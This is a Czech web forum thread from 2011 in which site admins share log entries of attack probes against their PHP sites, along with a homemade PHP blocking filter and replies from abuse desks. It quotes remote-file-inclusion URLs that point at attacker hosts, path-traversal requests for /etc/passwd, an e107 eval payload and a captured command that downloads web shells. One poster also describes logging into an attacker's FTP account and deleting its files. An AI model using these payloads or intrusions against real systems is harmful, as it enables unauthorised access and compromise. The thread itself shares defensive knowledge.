tak jsem se díval na svůj web do logu a vyfiltroval jsem si to podle statusu 404 stránka neexistuje a zde je pár ukázek, jak se během několika málo dní objeví celá řada pokusů o identifikaci na čem web běží a pokůsů o hack:

GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://parepare.nab.su/parepare.jpg?? - v různých variantách za tím =

GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://parepare.nab.su/parepare.jpg?? - zase řada různých verzí

GET /admin/banner_manager.php/login.php
GET /admin/categories.php/login.php
GET /admin/file_manager.php/login.php
GET /administrator/index.php
GET /CHANGELOG.txt
GET /article.php?id_article=58'
GET /misc/tabledrag.js
GET /sitecore/login
GET //index.php?r=../../../../../../../../../../../../..//proc/self/environ%0000
GET /index.php?nic=http://www.menrs.gov.mg/coopuniv/vero.txt?
GET /umbraco/css/umbracoGui.css
POST /contact.php

a tyhle dotazy se objevují i v různých podadresářích, takže to zkouší jestli systém není někde zanořen

a zajímavé je také tohle:
GET /url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEYAAAAOCAYAAACSJWqFAAA.... ...K5CYII%3d)
které má 1664 set znaků v těch datech, je to tam několikrát a ty data jsou pokaždý stejný, i když se liší ip a user agent a ani po dekódování mi z toho nevylezl obrázek, ale možná mám někde chybu při dekódování

UPDATE : tak před base64 dekodovanim se to musi jeste url dekodovat, kvuli několika znakům %xx a pak z toho je proužek ikon od google [http://www.phprs.net/forum/file.php?5,file=320] jen je to potřeba přejmenovat na png, neboť to sem vložit nejde



Celkem upraveno 2×. Poslední úprava MirekS v 05.09.2011 17:24.

a je zajímavé, že tyto pokusy jsou dost čast z nějakých serverů, očekával bych spíš nějaké zavirované PC, které sbírá informace:
linux.operahost.com.br [184.82.65.146]
hm2883.locaweb.com.br [187.45.193.211]
web83c40.carrierzone.com [209.235.156.93]
web25c40.carrierzone.com [209.235.156.35]
www01.hostersi.pl [91.201.153.34]
appserver3.web-conzept.de [178.63.121.8]

MirekS napsal/a:
-------------------------------------------------------
GET //index.php?r=../../../../../../../../../../../../..//proc/self/environ%0000

tak admina tohoto serveru se mi podarilo kotaktovat s timto vysledkem:

Our server contained a webpage which was compromised. The webpage is now
disabled and should not attack Your server anymore.

Regards.

přidávám další

GET /admin/sqlpatch.php/password_forgotten.php?action=execute
GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://maloestado.com/logo2.jpg

a musím říct, že kontaktovaní admini vycházejí vstříc
další reakce:
Thank you for submitting the log chunks for us, we appreciate it. We have dealt with the issue per our TOS and don't expect you will see further incidents of this nature, if you do however please feel free to contact us again in the future. Again, sorry for your inconvenience and thank you for your time!

tak jsem na základě výše uvedených logů udělal skript ban.php, který volám na začátku každého php skriptu, aby případné pokusy o průnik zmařil chybou 404 Not found

do {
    if (isset($_SERVER['PATH_INFO'])) {
      break;
      }
    $reg_v='~(http:)|(ftp:)|(\.php)|(\.htm)|(\.dll)|(\.asp)|(hash)|(option)|(com_user)|(view)|(layout)|(confirm)|(\.\./\.\.)~';
    if (preg_match($reg_v, $_SERVER['QUERY_STRING'])) {
      break;
      }
    return;
    } while (false);
  header('HTTP/1.0 404 Not Found');
  exit;

1. isset($_SERVER['PATH_INFO']) - je ochrana proti zadání dalšího skriptu za názvem toho prvního - např. /index.php/login.php (výše uvedené GET /admin/file_manager.php/login.php )

2. regulární výraz definuje co nesmí být za ? jako parametr stránky - to si případně každý modifikujte, podle toho, co používáte - např. máte tam view, tak to vymažte z toho regulárního výrazu - a to \.\./\.\. je oescapavané ../.. tedy ty pokusy o volání něčeho z nadřazeného adresáře

protože kromě výše uvedeného jsem našel i :
GET /index.php?q=../../../../../../../../../etc/passwd



Celkem upraveno 4×. Poslední úprava MirekS v 14.09.2011 09:11.

tak jsem našel další, to by mělo zajímat hlavně správce IIS

/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=4518&STRMVER=4&CAPREQ=0
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=4518&STRMVER=4&CAPREQ=0

MirekS napsal/a:
-------------------------------------------------------
> tak jsem na základě výše uvedených logů udělal skript ban.php, který volám na začátku každého php
> skriptu, aby případné pokusy o průnik zmařil chybou 404 Not found

dobrej kousek kodu :-)


> protože kromě výše uvedeného jsem našel i :
> GET /index.php?q=../../../../../../../../../etc/passwd

no a co? /etc by nemělo být z venku vůbec dostupné, natož ze scriptu


p.s.
kdysi dávno jsem dostal školení:

include_path = "." // nikam jinam
server musí běžet vždy s právy bezprizorního usera // pokud už někdo škodí, pak s nejmenšími právy
uzamknout web do chrootu // nejlépe na jiný hdd, pak se blbě dostává ven
useři webů nepotřebují login // taky k čemu :-)


njn, ale tyhle kecy jdou aplikovat většinou jen na vlastní mašině :-((



-- JaV ---- [http://www.hades.cz] ---- security by obscurity ---------------------------------------------
motto:
It's OK to be ignorant; it's not OK to play stupid.
But it's simply not efficient for us to try to help people who are not willing to help themselves.
----------------------------------------------------------------------------------------------------------------------

JanVar napsal/a:
> > GET /index.php?q=../../../../../../../../../etc/passwd
>
> no a co? /etc by nemělo být z venku vůbec
> dostupné, natož ze scriptu
>
jak píšeš dále, na vlastním stroji si člověk zabezpečení může udělat pořádně, ale u hostingu nikdy neví, jak to tam vlastně funguje, navíc ten přesun do nadřazeného adresáře nemusí být jen do etc, může to být jen k jinému php skriptu, jsou případy, kdy se takto dostane do "sousední" hostované domény nebo k session či tmp datům, kam si "něco" poslal, jemu stačí si na hostingu založit pár vlastních "testovacích" domén, kde si absolutní cestu snadno zjistí, vyzkouší, jak se mezi nimi pohybovat, a pak napadne ostatní kolem sebe



Celkem upraveno 1×. Poslední úprava MirekS v 13.09.2011 10:39.

a další reakce:
Hello,
sorry for the Attack, my server was hacked!
I hope i found the security hole.

Best Regards
Martin

---

I have forwarded you message to Rackspace my hosting company to see what they know.

Thanks

---

Hi,

I just forwarded to the owner. He's doing intensive check.

Thanks

---

případně, když jsem nenašel přesný kontakt:
I resend your message to the responsable of server. our web is no hosted in this server now.
Thanks for your message.

Martin Constante

---

takže asi to tedy není marná snaha, posílat upozornění na pokusy o hack serveru "původcům" těchto útoků

JanVar napsal/a:
> > protože kromě výše uvedeného jsem našel i :
> > GET /index.php?q=../../../../../../../../../etc/passwd
>
> no a co? /etc by nemělo být z venku vůbec
> dostupné, natož ze scriptu
>

no jak se zdá, podobné školení o Apache a zabezpečení, co jsi dostal ty, jiní nedostali, viz odpověď od správce serveru, ze kterého tyhle útoky chodily:

Hi,

We found a vulnerability in apache and patch it.
Don't hesitate to tell us if you still have problem with this IP.

Regards

To: MirekS

nechci do toho moc "rejpat" bohužel, dneska se podívej, kdo dělá adminy na hostinzích.... (to jen tak na okraj...)

navíc, hostingy by opravdu měly běžet odděleně, a i tebou zmiňovaný "temp" by měl mít každý user (zakazník ) vlastní. to je první předpoklad ochrany sdíleného serveru (asi jsem paranoidní :-)) ), ale když vidím ty pokusy o průnik u sebe na strojich, jinak to nejde...


gr.. to jsem se zase rozkecal, raději už mlčím, ale i tak, passwd je stejně k ničemu, snad jen, že získáš usery a služby(proto jsem se zmiňoval o chroot), hesla jsou už léta jinde (kdysi se shadow muselo doinstalovávat, to si ještě pamatuju :-)) )

-- JaV ---- [http://www.hades.cz] ---- security by obscurity ---------------------------------------------
motto:
It's OK to be ignorant; it's not OK to play stupid.
But it's simply not efficient for us to try to help people who are not willing to help themselves.
----------------------------------------------------------------------------------------------------------------------



Celkem upraveno 1×. Poslední úprava JanVar v 16.09.2011 22:06.

jinak ty pokusy o průnik s tím POST contact.php v post datech obsahují:

[_POST] => Array
  (
      [send-contactus] => 1
      [author_name] => [php]eval(base64_decode('... ....=='));die();[/php]
  )

a zneužívá to tuhle díru [http://php-security.org/2010/05/19/mops-2010-035-e107-bbcode-remote-php-code-execution-vulnerability/index.html]

bohužel nejde to sem vložit, neboť antivir mi to detekuje jako virus, takže pokud by někdo měl zájem, tak mu to můžu předat nějak jinak, aby se antiviry nezbláznily.

a když jsem našel v logu jak se někdo pokouší includovat z ftp: ftp://815184_fox:[email]vidaloka@webfox.eu.pn[/email]/
tak jsem neváhal, přes ftp jsem se tam připojil, vše si vykopíroval a pak smazal...
má-li někdo zájem, mohu zase nějak předat



Celkem upraveno 7×. Poslední úprava MirekS v 17.09.2011 14:05.

tak protože výše uvedené útoky přes contact.php moc neustávají, tak jsem si udělal falešný contact.php
útočník si vypisuje funkcí php_uname() systém, na kterém to běží a před ním a po něm své jméno:

v0pCr3w
sys:Windows NT MIREK-PC 6.1 build 7601 (Unknow Windows version Home Premium Edition Service Pack 1) AMD64
nob0dyCr3w

takže jeho jména z POST požadavku separuji a vrátím mu to, co opravdu poslal, ale typ systému jsem mu trochu poopravil:

v0pCr3w
sys:Windows 3.11 HACKERS-PC 3.1 build 76 (Fuck You) Intel16
nob0dyCr3w

tak jsem zvědav, co tomu bude říkat :-))

<OT>
To:MirekS
budeme sice OT, ale uvědom si, že tihle "blbečci" jedou z mašin, kterí se jim většinou povedlo hacknout.
A i ta IP bývá falešná, takže jen "spamuješ" admina, který má "mašinu" na kterou kašle :-(. Tihle "Lameři" jsou totiž "PAKA", co seberou na NETu nějaké scripty a pokoušejí se něco dobýt (poškodit stánky, případně i server...)

A pokud se jim to povede, pak si admin nezaslouží svůj plat....
</OT>

no nic, zase jsem se rozkecal...


smrt a choleru na ty "hajzlíky"...

-- JaV ---- [http://www.hades.cz] ---- security by obscurity ---------------------------------------------
motto:
It's OK to be ignorant; it's not OK to play stupid.
But it's simply not efficient for us to try to help people who are not willing to help themselves.
----------------------------------------------------------------------------------------------------------------------



Celkem upraveno 1×. Poslední úprava JanVar v 22.09.2011 18:49.

IP být falešná nemůže (tedy pokud někdo nehacknul router na cestě) a pokud spamuji neschopného admina, tak jenom dobře, třeba se nakonec vzchopí
ale zatím jsem se setkal ve většině případů naopak s kladnými reakcemi, ať už u adminů strojů, které provádějí útoky, nebo u majitelů stránek případně adminů jejich hostingů, kde se hostuje nebezpečný kód, který se snaží do jiných stránek podstrčit (byroe.jpg není jpg ale php kód : 69.162.95.27 GET /view.php?No=http://dhmania.com.br/byroe.jpg?? HTTP/1.1 - tohle bohužel zatím stále funguje)

tak na falešný contact.php se hacker chytil a teď se snažil provést:
if(@copy("http://traceyhughes.com.au/images/ipays.jpg","images.php")) { echo "c0liSUKSESc0li";@copy("http://raminco.org//etellat/temp/byroe.jpg","none.php");@copy("http://raminco.org//etellat/temp/allnet.jpg","one.php");} elseif(@copy("http://traceyhughes.com.au/images/ipays.jpg","e107_themes/images.php")) { echo "ipays_dthem";@copy("http://raminco.org//etellat/temp/byroe.jpg","e107_themes/none.php");@copy("http://raminco.org//etellat/temp/allnet.jpg","e107_themes/one.php");} elseif(@copy("http://traceyhughes.com.au/images/ipays.jpg","e107_plugins/images.php")) { echo "ipays_dplug";@copy("http://raminco.org//etellat/temp/byroe.jpg","e107_plugins/none.php");@copy("http://raminco.org//etellat/temp/allnet.jpg","e107_plugins/one.php");} elseif(@copy("http://traceyhughes.com.au/images/ipays.jpg","e107_images/images.php")) { echo "ipays_dima";@copy("http://raminco.org//etellat/temp/byroe.jpg","e107_images/none.php");@copy("http://raminco.org//etellat/temp/allnet.jpg","e107_images/one.php");}

A ani na východ od nás nejsou lhostejní o útocích z jejich serverů:

Hello.

Problem is solved.

hm... neumí to tu azbuku
[img]http://phprs.svrcek.cz/besthosting.gif[/img]
-----------------------------------

a možná jste taky dostali řadu spamu, kde vám nabízeli kurz na oddělení kontoly plateb za 1000 eur s odkazem na email [email]exx.corpmail@juno.com[/email] :

Hello,

Thank you for contacting Juno email support.

We've investigated your complaint and taken action against the offending Juno account per our policies.

Juno has a zero tolerance spam policy. We investigate all reports of abuse and terminate accounts that violate the Juno Service Agreement.

For the latest version of our policies, please see:
[http://www.juno.com/legal/terms.html]

If you receive similar messages in the future, please forward them to <[email]abuse@support.juno.com[/email]> along with their full headers.

Thanks again for helping us combat email abuse!

Sincerely,

Rose Karsen
Security & Abuse Dept.
Juno Customer Care
[http://www.juno.com/support/security]

------------------------------------------------------------------------------------------
Tip: Help us combat spam/scam by using the "Report Junk" button on Webmail or forwarding them to Spamdesk <[email]spamdesk@support.juno.com[/email]>, along with their full headers.

For all other security and abuse related (hacking, viruses, mail delivery failure) queries write to <[email]abuse@support.juno.com[/email]> with a brief description of your problem or query.
------------------------------------------------------------------------------------------



Celkem upraveno 3×. Poslední úprava MirekS v 26.09.2011 13:50.

jinak v poslednich dnech se objevily útoky na phpMyAdmin, tak protože se objevilo několik nových verzí rychle po sobě, tak tam asi "něco bylo" co rychle opravovali:

GET //admin/phpmyadmin/scripts/setup.php
GET //typo3/phpmyadmin/scripts/setup.php
GET //phpmyadmin2/scripts/setup.php
GET //xampp/phpmyadmin/scripts/setup.php
GET //phpMyAdmin-2.2.3/scripts/setup.php
GET //phpMyAdmin-2.2.6/scripts/setup.php
GET //phpMyAdmin-2.5.1/scripts/setup.php
GET //phpMyAdmin-2.5.4/scripts/setup.php
GET //phpMyAdmin-2.5.5-rc1/scripts/setup.php
GET //phpMyAdmin-2.5.5-pl1/scripts/setup.php
GET //phpMyAdmin-2.6.0-beta2/scripts/setup.php
GET //phpMyAdmin-2.7.0-pl2/scripts/setup.php
GET //phpMyAdmin-2.8.2/scripts/setup.php

tak kdo ho používáte, tak si dejte pozor